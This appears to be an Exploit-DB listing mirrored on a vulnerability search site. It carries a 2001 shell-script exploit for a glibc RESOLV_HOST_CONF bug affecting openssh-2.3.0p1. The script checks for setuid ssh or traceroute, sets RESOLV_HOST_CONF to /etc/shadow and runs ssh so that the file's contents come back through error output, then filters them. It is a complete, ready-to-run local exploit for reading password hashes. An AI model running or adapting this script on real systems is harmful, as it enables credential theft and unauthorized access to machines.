Lucene search
KrochosEDB-ID:258HistoryJan 25, 2001 - 12:00 a.m.
glibc-2.2 / openssh-2.3.0p1 / glibc 2.1.9x - File Read
2001-01-2500:00:00
krochos
www.exploit-db.com
32
AI Score
7.4
Confidence
Low
# Charles Stevenson <[email protected]>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****[email protected]****)
# Edit this if you have a problem with path
ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
###############################################################################
echo "$ssh"
echo "[*] Checking permisions..."
if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi
export RESOLV_HOST_CONF=$FILE
echo "[*] Glibc bug found by Charles Stevenson <[email protected]>"
echo "[*] [email protected]"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '
# milw0rm.com [2001-01-25]Related
cve
cve
CVE-2001-0170
2001-05-07 04:00:00
cvelist
cvelist
CVE-2001-0170
2001-05-07 04:00:00
exploitdb
exploitdb
Resolv+ 'RESOLV_HOST_CONF' - Linux Library Command Execution
1996-01-01 00:00:00
nvd
nvd
CVE-2001-0170
2001-03-26 05:00:00